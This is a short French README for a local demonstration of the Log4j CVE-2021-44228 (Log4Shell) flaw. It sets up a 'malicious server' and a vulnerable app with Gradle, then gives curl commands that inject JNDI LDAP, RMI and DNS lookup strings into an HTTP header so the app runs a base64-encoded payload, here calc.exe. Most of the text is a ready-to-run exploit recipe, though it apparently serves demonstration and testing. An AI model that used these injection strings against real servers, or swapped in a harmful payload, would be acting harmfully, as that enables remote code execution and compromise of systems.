
Exemples Log4j CVE-2021-44228 : Exécution de code à distance (via LDAP, RMI, ...), Requêtes DNS forcées, ...
Utilisez un JDK vulnérable, par exemple JDK 1.8.0_181
Le serveur malveillant déploie les points de terminaison suivants :
./gradlew :malicious-server:bootRun
L'application vulnérable déploie un point de terminaison HTTP sur 8082
./gradlew :vulnerable-app:bootRun
Choisissez un payload qui sera exécuté par l'application vulnérable et encodez-le en Base64. Par exemple, pour ouvrir la
calculatrice sous Windows : calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/